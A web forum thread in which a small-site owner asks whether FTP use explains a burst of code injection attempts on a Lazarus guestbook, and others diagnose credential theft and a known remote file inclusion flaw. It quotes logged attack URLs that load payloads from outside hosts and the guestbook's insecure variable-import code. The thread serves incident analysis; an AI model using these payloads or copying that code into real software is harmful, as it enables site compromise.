SitePoint Sponsor

User Tag List

Results 1 to 24 of 24
  1. #1
    Life is not a malfunction gold trophysilver trophybronze trophy
    TechnoBear's Avatar
    Join Date
    Jun 2011
    Location
    Argyll, Scotland
    Posts
    6,205
    Mentioned
    264 Post(s)
    Tagged
    5 Thread(s)

    Code Injection Attempts linked to FTP?

    My hosting company won't allow me to use SFTP or FTPS, so after three of my sites were hacked, I decided to upload files only through the cpanel file manager with a secure log-in.

    Two days ago, I had quite a number of files to upload to one site, to update the guest book, so I used FTP for convenience and changed the passwords immediately afterwards. In the last 48 hours, there have been 38 code injection attempts on that site, all targeting the guest book. There were only two in the whole of the preceding two months, which makes me wonder if there is some connection here, although it's hard to see what. None of my other sites have been targeted recently, including another one on the same server.

    Is this just a co-incidence, do you think?

  2. #2
    SitePoint Enthusiast
    Join Date
    May 2011
    Posts
    35
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Out of curiosity, how do you track the code injection attempts?

    Can it be that the guest book version you are using has a public vulnerability? A common practice for automated injection bots is to search on Google for sites with specific plugins that are known to be vulnerable (the search terms are called Google Dorks - Google Hacking Database, GHDB, Google Dorks). It is their way to cover many sites but still target sites that are more likely to be vulnerable.
    Incapsula:
    Maximum Security and Performance for any Web Site - FREE Signup

  3. #3
    Life is not a malfunction gold trophysilver trophybronze trophy
    TechnoBear's Avatar
    Join Date
    Jun 2011
    Location
    Argyll, Scotland
    Posts
    6,205
    Mentioned
    264 Post(s)
    Tagged
    5 Thread(s)
    Thanks for the information and the link.

    Quote Originally Posted by eldad View Post
    Can it be that the guest book version you are using has a public vulnerability?
    I'm pretty sure that's not the problem. I can't find anything recent regarding the guest book, and nothing major at any time. I'm using the latest version. I also have the same script installed on another site and have had no problems. On both sites I renamed the directory when I installed it (for convenience, not obfuscation) and disallowed it in my robots.txt file. I know this doesn't keep out the bad guys, but at least I'm not advertising its presence on Google.

  4. #4
    SitePoint Enthusiast
    Join Date
    May 2011
    Posts
    35
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Interesting... A lot of questions can be asked...
    From what IPs did the injection attempts come from? Did you see other visits from those IPs? Were the attempts from humans or bot agents? What are the injection vectors (any references online)?
    Incapsula:
    Maximum Security and Performance for any Web Site - FREE Signup

  5. #5
    Life is not a malfunction gold trophysilver trophybronze trophy
    TechnoBear's Avatar
    Join Date
    Jun 2011
    Location
    Argyll, Scotland
    Posts
    6,205
    Mentioned
    264 Post(s)
    Tagged
    5 Thread(s)
    Four different IPs, from US, Spain, France and Bulgaria. No previous visits from those IP in the last couple of months (I haven't checked further back). I'm not sure how to tell if they're human or bot.
    I did try looking online for more information, but couldn't find anything relevant. There were references to several other domains, but none of these flagged up anything particularly nasty at Site Advisor or elsewhere.
    This is one of the sites that was hacked previously, and on that occasion files were uploaded by FTP. I have the IP address for the previous attack and there doesn't seem to be any connection.

  6. #6
    SitePoint Zealot
    Join Date
    Oct 2008
    Posts
    167
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    If you have your account password stored anywhere on your personal computer and if your personal computer is infected with spyware or malware, then it may be sending out your username and password information. It wouldn't make any difference if you are using SFTP or FTPS to connect to your FTP account, or if you used the secure cPanel link. If your password is stored in plaintext or easily breakable encryption on your local computer, that information can be harvested if you are infected with malware.

    A lot of malware will do this, just target your local computer and attempt to harvest your username and password. Then it is not relevant if your webhosting account is running an outdated and vulnerable script. Whoever gains access to your username and password has full access to your webhosting account.
    CanisHosting - Web Hosting plans starting at $3.95 per month

  7. #7
    Avid Logophile silver trophy
    ParkinT's Avatar
    Join Date
    May 2006
    Location
    Central Florida
    Posts
    2,335
    Mentioned
    192 Post(s)
    Tagged
    4 Thread(s)
    What software product are you using to accomplish the FTP?
    Perhaps it (freeware/malware) is logging your activity and then generating the extraneous traffic you see.

    Try using FTP from the command line (Windows, Linux or Mac) and not some software WYSIWYG.
    Don't be yourself. Be someone a little nicer. -Mignon McLaughlin, journalist and author (1913-1983)


    Git is for EVERYONE
    Literally, the best app for readers.
    Make Your P@ssw0rd Secure
    Leveraging SubDomains

  8. #8
    Life is not a malfunction gold trophysilver trophybronze trophy
    TechnoBear's Avatar
    Join Date
    Jun 2011
    Location
    Argyll, Scotland
    Posts
    6,205
    Mentioned
    264 Post(s)
    Tagged
    5 Thread(s)
    There isn't, and never has been, any kind of malware on my computer, nor does anyone else have access to it or to my passwords (which are different for every site).

    I stopped using FTP because I was advised it sends the password in plain text, making it easy to intercept. Using the command line would not make things any more secure, as far as I can see.

  9. #9
    Non-Member bronze trophy
    Join Date
    Nov 2009
    Location
    Keene, NH
    Posts
    3,760
    Mentioned
    23 Post(s)
    Tagged
    0 Thread(s)
    I would much more suspect the guest book itself than FTP... Though again as already asked how are you tracking "code injection attempts" -- that part alone sounds kinda fishy.

  10. #10
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,169
    Mentioned
    190 Post(s)
    Tagged
    2 Thread(s)
    A guestbook is one of the reasons I got into PHP years ago.

    I had been busy learning (horrid) mark-up, inline styling, animated gifs galore and stupid javascript tricks for my new found web presence

    I wanted a guestbook so I downloaded one and put it online.

    After my site had been hacked (site, NOT guestbook) I traced it to several security flaws in the guestbook app (use of unsanitized global variables). I am now very wary of using third party apps. At times they may be intentionally malicious, other times once a vulnerability is published script-kiddies go hunting for them.

    To get to my point,
    Is the guestbook app from a trusted source?
    Are you keeping up-to-date for security fixes assuming it's maintained?

  11. #11
    Life is not a malfunction gold trophysilver trophybronze trophy
    TechnoBear's Avatar
    Join Date
    Jun 2011
    Location
    Argyll, Scotland
    Posts
    6,205
    Mentioned
    264 Post(s)
    Tagged
    5 Thread(s)
    Quote Originally Posted by Mittineague View Post
    To get to my point,
    Is the guestbook app from a trusted source?
    Are you keeping up-to-date for security fixes assuming it's maintained?
    The guest book was installed via cpanel using Softaculous, and as mentioned in an earlier post, is the latest version. In fact, it was the need to update the guest book that led to me using FTP a couple of days ago, because of the number of files involved. (The other site on which I have the guest book I can update using the update feature in Softaculous, but for some reason that doesn't work properly on this site.)

    I think the guest book is a red herring here. At the point when the site was hacked, there was no guest book installed. This site, and the other two that were hacked, were all small, static HTML-only sites - no PHP, no Javascript, no scripts of any kind.

  12. #12
    Non-Member bronze trophy
    Join Date
    Nov 2009
    Location
    Keene, NH
    Posts
    3,760
    Mentioned
    23 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by TechnoBear View Post
    The guest book was installed via cpanel using Softaculous, and as mentioned in an earlier post, is the latest version.
    Ouch and Ouch -- two things I don't trust to begin with... Generally Softascrewup is only as good as the ISP who keeps the scripts up to date -- did you use it to keep the updates or have you been updating it manually? Just exactly WHICH guestbook is it?

    Quote Originally Posted by TechnoBear View Post
    I think the guest book is a red herring here.
    Funny, your new post makes me look even HARDER at it.

    Quote Originally Posted by TechnoBear View Post
    At the point when the site was hacked, there was no guest book installed. This site, and the other two that were hacked, were all small, static HTML-only sites - no PHP, no Javascript, no scripts of any kind.
    Again, how are you 'tracking' that or knowing they were hacked... you're being a bit vague on that subject. (I'm starting to wonder if you know what a code injection IS).

  13. #13
    Community Advisor silver trophy

    Join Date
    Nov 2006
    Location
    UK
    Posts
    2,551
    Mentioned
    40 Post(s)
    Tagged
    1 Thread(s)
    Quote Originally Posted by TechnoBear View Post
    There isn't, and never has been, any kind of malware on my computer, nor does anyone else have access to it or to my passwords (which are different for every site).
    I recall analysing a hacking issue of some websites, where eventually by painstaking research the source was tracked down to a user who had absolutely insisted the exact same thing, except wireshark proved unequivocally that network packets with ftp logins were travelling outwards to russia from their pc Some of the ftp stealing type trojans don't show up on common av software, so don't discount the possibility if there is a genuine issue.

    It is more likely as deathshadow60 has pointed out that the guestbook is attracting the unwanted attention however, I'd check for any presence of it on exploit lists.

  14. #14
    Life is not a malfunction gold trophysilver trophybronze trophy
    TechnoBear's Avatar
    Join Date
    Jun 2011
    Location
    Argyll, Scotland
    Posts
    6,205
    Mentioned
    264 Post(s)
    Tagged
    5 Thread(s)
    Quote Originally Posted by deathshadow60 View Post
    Ouch and Ouch -- two things I don't trust to begin with... Generally Softascrewup is only as good as the ISP who keeps the scripts up to date -- did you use it to keep the updates or have you been updating it manually?
    As I've said before, on one site I've used it to do the updates. On this site, it won't update properly via Softaculous and I've downloaded the updates from the official site.
    Quote Originally Posted by deathshadow60 View Post
    Just exactly WHICH guestbook is it?
    Lazarus Guest Book v1.15. All the directory permissions are set to 505 and the files to 404.
    Quote Originally Posted by deathshadow60 View Post
    Again, how are you 'tracking' that or knowing they were hacked... you're being a bit vague on that subject. (I'm starting to wonder if you know what a code injection IS).
    OK, I freely admit to being a novice in this area. It's one of the main reasons I joined this forum, to try to learn more about security. However, even I can spot an IP address that isn't mine in my FTP logs and a directory I didn't create in my Web space.

    I didn't post details, because I didn't think it was relevant, but as you seem to suspect I'm havering, I'll give you the details now and apologise to everybody else for the long post.

    I have a number of sites, of which three were hacked over the space of about a month. On one site, a directory called "allyn" containing a single file called "spilled.php" was added, my .htaccess file permissions were changed and the file itself was altered. The files were uploaded from 213.5.68.141, which is not my IP. I didn't notice it until a couple of weeks later, by which time Google had found around 230 supposed URLs for my site which I knew nothing about. e.g. mydomain//Auckland-volkswagen-cabrio-instrument-dashboard-symbols-warning-lights/ Most of the others are pornographic in nature. It was when one of these showed up in my AWStats that I first realised something was amiss and started to investigate further. I then checked all my other sites.

    On another site - the one referred to in my original post in this thread - a directory called "narrator" containing a single file called "sherriffs.php" was added, my .htaccess file permissions were changed and the file itself was altered. The files were uploaded from 213.5.69.27, which is also not my IP. I discovered this one the day after it was hacked and removed the directory immediately. Two days later, this appeared in the logs:
    Url: /narrator/sherrifs.php?sheme=157&redirect=http%3A%2F%2Fsecureweblogs.net%2Fstat%2Fcheck%2F
    web.php&dgen=http%3A%2F%2Fsecurecheck3.net%2Fgenerator_root_image%2Fgenerator.php&secvalue
    =5978197fcdec1d5de383c1b5f3431c41&cached=true&remove_file=true 95.168.165.98
    Again, the IP address is not mine.

    The third site had fours files added to the cgi-bin. I don't know exactly when or how, as there are no entries in the FTP logs apart from my own visits. The files added were:
    cgiecho
    randhtml.cgi
    entropybanner.cgi
    cgiemail
    I have no idea what they did or were meant to do, as I couldn't read them i.e. the characters were displaying largely as boxes, as if in an unknown font. I had never had cause to use the cgi-bin and would probably never have discovered these had I not been scrutinizing everything after I found the first hack.

    As I mentioned before, at this point all these sites consisted of nothing but static html pages.

    My hosting company was not helpful, insisting any problem must originate at my end. A friend recommended Crawl Protect, which I have since been using on all my sites. I have found it surprisingly difficult to find beginners' security information on the Web, which again brings me back to this forum.

    The 38 code injection attempts I mentioned are reported by Crawl Protect and logged as
    Url: /guestbook.php//admin.php?include_path=http://sebri.net/templates/osCommRes/images/allnet.jpg?? 12.185.242.246
    Url: /guestbook.php/admin.php?include_path=http://ztrackonline.com/images/tmp/x/sangatta.txt?? 94.23.83.227
    Url: /guestbook.php//admin.php?include_path=http://www.yuriamorim.com//includes/domit/Z6.txt?? 87.120.106.5
    Url: /guestbook.php/admin.php?include_path=http://ztrackonline.com/images/tmp/x/parepare.txt?? 213.251.135.16
    etc etc. Need I mention that none of those IPs is mine?
    Quote Originally Posted by EastCoast View Post
    I recall analysing a hacking issue of some websites, where eventually by painstaking research the source was tracked down to a user who had absolutely insisted the exact same thing, except wireshark proved unequivocally that network packets with ftp logins were travelling outwards to russia from their pc Some of the ftp stealing type trojans don't show up on common av software, so don't discount the possibility if there is a genuine issue.
    I do realise that is the obvious problem. However, I'm running a Linux PC with all updates done. I don't use wi-fi, it isn't on a network and no-one else has access to it. Apart from a few well-known Firefox add-ons downloaded from Mozilla, there is nothing installed on this machine that didn't come from the official repositories. Nevertheless, I have scanned it (repeatedly) with ClamAV and found nothing. If you can suggest any further precautions I can take, I should be grateful.

    Also, one site was hacked the day after I used FTP to upload files, but the other was hacked nearly three weeks after I'd last accessed it. Is it normal for hackers to wait that long after intercepting a password and risk it being changed?

    Quote Originally Posted by EastCoast View Post
    It is more likely as deathshadow60 has pointed out that the guestbook is attracting the unwanted attention however, I'd check for any presence of it on exploit lists.
    I tried looking for that kind of information before I installed it and couldn't find any, which I took to be a good sign. Perhaps I'm missing something, but it seems OK and I've never had any problems with the other site, where the guestbook has been installed slightly longer.

    Again, my apologies for a very long post.

  15. #15
    Non-Member bronze trophy
    Join Date
    Nov 2009
    Location
    Keene, NH
    Posts
    3,760
    Mentioned
    23 Post(s)
    Tagged
    0 Thread(s)
    Can't say I've heard of lazarus, but poking my head into it's admin.php (which seems to be drawing the most attention)
    Code:
    if (!isset($PHP_SELF)) 
    {
      $PHP_SELF = $_SERVER['PHP_SELF'];
      if (isset($_GET)) 
      {
        while (list($name, $value) = each($_GET)) 
        {
          $$name = $value;
        }
      }
      if (isset($_POST)) 
      {
        while (list($name, $value) = each($_POST)) 
        {
          $$name = $value;
        }
      }
      if (isset($_COOKIE)) 
      {
        while (list($name, $value) = each($_COOKIE)) 
        {
          $$name = $value;
        }
      }
    }
    *SIGH*... EVERY time I see this type of idiotic code my brain goes "WHAT THE HELL ARE THEY DOING?!?" -- be real fun to pass it something like admin.php?_SERVER

    Sure, they have this fix after:
    Code:
    if (isset($include_path))
    {
      die("Hacking Attempt!");
    }
    That's bubblegum on a leaky bike tire instead of using a real patch or replacing the tube... Though that explains your log entries as that's just bots trying to use a known exploit that's been patched. Of course christmas only knows how bad the entire server was pwned before it was patched -- especially since it sounds like you're on shared hosting, so if someone else is still running unpatched you could still get pwned.

    Eval for the templates? Blindly trusting global vars? EVERYTHING in global scope? Total pwnage.

  16. #16
    SitePoint Zealot
    Join Date
    Oct 2008
    Posts
    167
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    An FTP hack and a script hack are two completely different animals.

    If someone is uploading material via FTP that are not authorized by you, then this means someone has access to your webhosting login information. How they got that information is unknown. Usually this means that you have malware running on your computer, either searching through the files on your computer for anything that would mention your username and password (an email, an FTP site manager, etc) or you have a packet sniffer installed on your computer, or perhaps somewhere on your network.

    Since you said you are running Linux, I would think this would minimize the malware threat. I'm not aware of any such malware like this that runs on Linux, but that doesn't mean Linux is infallible.

    Are there other computers that have your login information stored on them? Perhaps one of those computers is infected.

    What some people don't realize, is that their own computer can be completely safe and completely free of any virus or malware. But if you log into your account from a public wifi hotspot, or at a public library, or any where else, the security of those areas has to be called into question. You're computer might be safe, but if you access your FTP account from a library terminal that is infected with malware, then that can steal your information.

    A script hack means that an outside visitor, someone accessing your website from the Internet, has taken advantage of a security hole in a script on your account.

    From what you have posted in the logs, it looks like someone is trying to exploit your guestbook using the admin.php remote file include exploit - CVE - CVE-2007-1486 (under review) - which was fixed in version 1.7.3. The information you posted from the logs just shows that they are attempting to exploit this. It doesn't necessarily mean that they are successful. If you are using version 1.15, you should be clear of this exploit. But again, this doesn't mean that there isn't another exploit in the script, but I don't see anything being disclosed. Lazarus Guestbook is up to version 1.16 but it is in beta, so 1.15 should be safe of any KNOWN threats.

    The only time these two types of exploits can be combined is if you have a script vulnerability that allows a malicious user to read the files on your webhosting account. And if you are using the same username and password in your script's config files for MySQL access as your main webhosting account login, then those malicious users can steal that information and then log in via FTP.

    You haven't stated if you are using cPanel or not. I come from a cPanel background, so I will use it as an example. This may not apply to you if you are not using cPanel.

    If you have a config file for your script and if the script uses MySQL databases. If, in that config file, you use your main FTP username and password, then a malicious user that exploits the vulnerability in your script (assuming that a script on your account is vulnerable), then that person can read this information and then access your account via FTP. Because all that is needed for FTP access is a hostname (your domain name, which they obviously know) and a username and password (which was stolen from the config file).

    With cPanel you can create separate MySQL username and assign them passwords. The MySQL username that is created will have your main username appended to it (in order to keep MySQL usernames unique in a shared hosting environment) so if you create a new username, but reuse your same password, then again all of this information is made available to the malicious user that exploited your site.

    Bottom line, always use a MySQL user for accessing your MySQL database, and never reuse your main account password.

    Worth mentioning, the config file routine is not the only way a malicious user can glean information. If a malicious user gains access to reading the files on your webhosting account through a script vulnerability, then they could conceivably read any email that might also be stored on your webhosting account. If your login information is stored there, then again this information can be stolen.

    I would be more concerned with how these IP addresses are getting your FTP information to log into your account. I assume you are using a strong password, something that is not hard to guess, in that case you have a vulnerability somewhere. Either on your computer, on a computer, or in a script on your website. You would immediately need to change your password, and tell nobody what the new password is. Don't log into your account from any other computer, and note if you have to change any configuration files because of this updated password. If your FTP account is compromised again, then this will help narrow down which computer or which system is vulnerable.

    It is possible, although highly unlikely, that your webhosting provider has been hacked and someone may have root access on the server. I say unlikely because your host should be seeing a number of infected websites on their server if they have been rooted. And generally a rooted server is not used to upload malicious links like you have stated. If someone has root access on a server, then they can do anything to that server, including deleting everything.
    CanisHosting - Web Hosting plans starting at $3.95 per month

  17. #17
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    as the lazarus guestbook has been known for several flaws - like the remote xss attack, allowing a user to create specially crafted url to execute arbitrary code, or to inject arbitrary script or html via the show parameter or img parameter, after the name of an existing file - there are a few other vulnerabilities that may help an attacker to steal cookiebased authentication credentials and launch other attacks - so there you have several input validation and several input manipulation vulnerabilities..

    In other words: the kids know about these previous vulnerabilities, and are trying to exploit 'em...

    But as sparek told ya, with 1.15 you should be safe for any known threats

    They probably used a vulnerability scanner, and maybe they postet the result log for others to have fun... maybe your site(s) listed as vulnerable on some forums etc ,because of the previous hack

    If everything is running the latest version/patches this may go away on its own - but I would monitor it anyway to keep an eye on whats going on
    Who's to doom when the judge himself is dragged before the bar


  18. #18
    Life is not a malfunction gold trophysilver trophybronze trophy
    TechnoBear's Avatar
    Join Date
    Jun 2011
    Location
    Argyll, Scotland
    Posts
    6,205
    Mentioned
    264 Post(s)
    Tagged
    5 Thread(s)
    Thanks, guys, for the replies and helpful information.

    Quote Originally Posted by sparek View Post

    Since you said you are running Linux, I would think this would minimize the malware threat. I'm not aware of any such malware like this that runs on Linux, but that doesn't mean Linux is infallible.

    Are there other computers that have your login information stored on them? Perhaps one of those computers is infected.
    I only ever log in from my own computer, which is a PC not a laptop and therefore only connects through my own ethernet modem and never a public wi-fi. It is not - and never has been - on any kind of network.
    Quote Originally Posted by sparek View Post
    From what you have posted in the logs, it looks like someone is trying to exploit your guestbook using the admin.php remote file include exploit - CVE - CVE-2007-1486 (under review) - which was fixed in version 1.7.3. The information you posted from the logs just shows that they are attempting to exploit this. It doesn't necessarily mean that they are successful. If you are using version 1.15, you should be clear of this exploit. But again, this doesn't mean that there isn't another exploit in the script, but I don't see anything being disclosed. Lazarus Guestbook is up to version 1.16 but it is in beta, so 1.15 should be safe of any KNOWN threats.
    Thanks. That's helpful and fairly reassuring.
    Quote Originally Posted by sparek View Post
    The only time these two types of exploits can be combined is if you have a script vulnerability that allows a malicious user to read the files on your webhosting account. And if you are using the same username and password in your script's config files for MySQL access as your main webhosting account login, then those malicious users can steal that information and then log in via FTP.
    Oh dear - I confess I'd never thought of that, although now it seems pretty obvious.
    Quote Originally Posted by sparek View Post
    You haven't stated if you are using cPanel or not.
    I am.
    Quote Originally Posted by sparek View Post
    If you have a config file for your script and if the script uses MySQL databases. If, in that config file, you use your main FTP username and password, then a malicious user that exploits the vulnerability in your script (assuming that a script on your account is vulnerable), then that person can read this information and then access your account via FTP. Because all that is needed for FTP access is a hostname (your domain name, which they obviously know) and a username and password (which was stolen from the config file).
    Well, I've just had a wee panic and looked at the database and the config file. The MySQL username is the same as the database name and the password is pretty strong and is not the same as the main account password. As these are the default settings, I can only assume Lazarus is brighter than I am!
    Quote Originally Posted by sparek View Post
    With cPanel you can create separate MySQL username and assign them passwords. The MySQL username that is created will have your main username appended to it (in order to keep MySQL usernames unique in a shared hosting environment) so if you create a new username, but reuse your same password, then again all of this information is made available to the malicious user that exploited your site.

    Bottom line, always use a MySQL user for accessing your MySQL database, and never reuse your main account password.
    Thank you. I'll remember that in future.
    Quote Originally Posted by sparek View Post
    Worth mentioning, the config file routine is not the only way a malicious user can glean information. If a malicious user gains access to reading the files on your webhosting account through a script vulnerability, then they could conceivably read any email that might also be stored on your webhosting account. If your login information is stored there, then again this information can be stolen.
    Again, that's something I hadn't thought about, although it's not a problem here. All admin e-mails for my various domains are sent to an e-mail address which is not associated with any of them.

    Quote Originally Posted by sparek View Post
    I would be more concerned with how these IP addresses are getting your FTP information to log into your account. I assume you are using a strong password, something that is not hard to guess, in that case you have a vulnerability somewhere.
    That has been concerning me, too. As I say, the sites were hacked over a period of about a month. I was away for some of this time, or I might have picked up on it sooner. As soon as I discovered the problem, I changed all the passwords for all my sites (not just those that were hacked) and haven't had any further problems. The passwords were all strong - mixed case, letters and numbers - and since I changed them, they now contain symbols, too. I never re-use old passwords and each account has a different password.

    If I log into my cPanel using mydomain/cpanel, as advised by the hosting company, it resolves to port 2082, which is not secure. I hadn't noticed this at first (oops again ), but since the hacks I've been very careful to login in using mydomain:2083, which uses https.

    Quote Originally Posted by Crazybanana View Post
    In other words: the kids know about these previous vulnerabilities, and are trying to exploit 'em...

    But as sparek told ya, with 1.15 you should be safe for any known threats
    Thanks again for the reassurance. I know I've been getting paranoid.
    Quote Originally Posted by Crazybanana View Post
    They probably used a vulnerability scanner, and maybe they postet the result log for others to have fun... maybe your site(s) listed as vulnerable on some forums etc ,because of the previous hack
    Until recently, I had no idea such forums even existed. What a sheltered life I've led!
    Quote Originally Posted by Crazybanana View Post
    If everything is running the latest version/patches this may go away on its own - but I would monitor it anyway to keep an eye on whats going on
    Since I started this thread, there have been another 34 attempts, much the same as before although from different IPs/countries. (Again, nothing targeting my other Lazarus guest book.) I find this really bizarre, not least because the site in question is a small local business, with only a handful of visitors per day and a couple of dozen inlinks, so I'm amazed that anybody has found it. The guestbook wasn't on it when it was hacked.

    Thanks again for the replies.

  19. #19
    SitePoint Guru rageh's Avatar
    Join Date
    Apr 2006
    Location
    London, Formerly Somalia
    Posts
    612
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by TechnoBear View Post
    My hosting company won't allow me to use SFTP or FTPS, so after three of my sites were hacked, I decided to upload files only through the cpanel file manager with a secure log-in.

    Two days ago, I had quite a number of files to upload to one site, to update the guest book, so I used FTP for convenience and changed the passwords immediately afterwards. In the last 48 hours, there have been 38 code injection attempts on that site, all targeting the guest book. There were only two in the whole of the preceding two months, which makes me wonder if there is some connection here, although it's hard to see what. None of my other sites have been targeted recently, including another one on the same server.

    Is this just a co-incidence, do you think?
    Code injection vulnerabilities are not easy to trace down. There could be a number of ways that such vulnerabilities can come about, many of which you ruled out. It is futile to speculate whether the a malware in your PC is the culprit or not. If you are in the Web business, you need to have SFTP period. If your host does not allow it(It is beyond me why now?), change it. Switch to another hosting company that only allow secure FTP. Even that does not guantee anything. But it could point the blame finger only in one direction.
    ------------------

  20. #20
    Life is not a malfunction gold trophysilver trophybronze trophy
    TechnoBear's Avatar
    Join Date
    Jun 2011
    Location
    Argyll, Scotland
    Posts
    6,205
    Mentioned
    264 Post(s)
    Tagged
    5 Thread(s)
    Quote Originally Posted by rageh View Post
    If you are in the Web business, you need to have SFTP period. If your host does not allow it(It is beyond me why now?), change it. Switch to another hosting company that only allow secure FTP. Even that does not guantee anything. But it could point the blame finger only in one direction.
    I also can't understand why they won't allow secure FTP. I have already moved some sites to another host, but I can't afford to move them all at once. I've found several hosting companies that allow secure FTP, but none that only allow secure FTP.

    All my sites are very small, which is why they're on shared hosting. This one has fewer than 200 visitors per month.

  21. #21
    SitePoint Wizard silver trophybronze trophy Stormrider's Avatar
    Join Date
    Sep 2006
    Location
    Nottingham, UK
    Posts
    3,133
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    I use a VPS - then I can set up and/or install whatever I want on there. I rarely use FTP now anyway, I'm usually logging invia SSH and rolling things out from SVN directly

  22. #22
    Life is not a malfunction gold trophysilver trophybronze trophy
    TechnoBear's Avatar
    Join Date
    Jun 2011
    Location
    Argyll, Scotland
    Posts
    6,205
    Mentioned
    264 Post(s)
    Tagged
    5 Thread(s)
    Yes - I've already decided that a VPS is the way to go in future. In the meantime, I'm stuck with what I've got for some of these sites and I'm pretty nervous of anything that seems odd. Hence my concern with this site, which has now been hit by over 100 of these attempts, while my other sites have been untouched over the same period. The only thing I've done differently with this site was access it (once, very briefly) by FTP.

  23. #23
    SitePoint Enthusiast cluongo's Avatar
    Join Date
    Jun 2011
    Location
    Atlanta
    Posts
    71
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    More than likely like mentioned above, people use dorks to find venerable websites on Google very easily (seeing as how I'm sure that page got indexed with a big fat GUESTBOOK PLUGIN VERSION x1.0000 or whatever)

    Might be on a hack forum like said above. Might be from a vulnerability scanner like Websecurify, or any combination of the above.

    I read through all the posts here but try removing the guestbook if you haven't already.

    Also I noticed you said you used an FTP to upload all the files for the guestbook (instead of the usual cpanel ftp), which FTP program did you use and where did you download it from? (You didn't seem to answer the question when asked above unless im Blind, in that case I apologize!)

  24. #24
    Life is not a malfunction gold trophysilver trophybronze trophy
    TechnoBear's Avatar
    Join Date
    Jun 2011
    Location
    Argyll, Scotland
    Posts
    6,205
    Mentioned
    264 Post(s)
    Tagged
    5 Thread(s)
    Quote Originally Posted by cluongo View Post
    More than likely like mentioned above, people use dorks to find venerable websites on Google very easily (seeing as how I'm sure that page got indexed with a big fat GUESTBOOK PLUGIN VERSION x1.0000 or whatever)
    Mmmm - except it's disallowed in the robots.txt. I realise that won't keep out the bad bots, but it should keep it off Google.

    Quote Originally Posted by cluongo View Post
    I read through all the posts here but try removing the guestbook if you haven't already.
    Do you have any suggestions as to what I should replace it with that would be more secure? Sparek and Crazybanana both reckon the latest version is safe from known vulnerabilities and although there have been attempted hacks nothing has succeeded. As I keep saying, the other site I have which uses this guest book is unaffected, even though the guest book has been installed there slightly longer. There have also been no further attempts on this site in the last six days.
    Quote Originally Posted by cluongo View Post
    Also I noticed you said you used an FTP to upload all the files for the guestbook (instead of the usual cpanel ftp), which FTP program did you use and where did you download it from? (You didn't seem to answer the question when asked above unless im Blind, in that case I apologize!)
    I used Filezilla. As I mentioned before, everything on my system is installed from the official distro repositories. I apologise for not answering the original question, but I thought the point of that question was whether or not I might be using a dodgy app., which I'm not.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •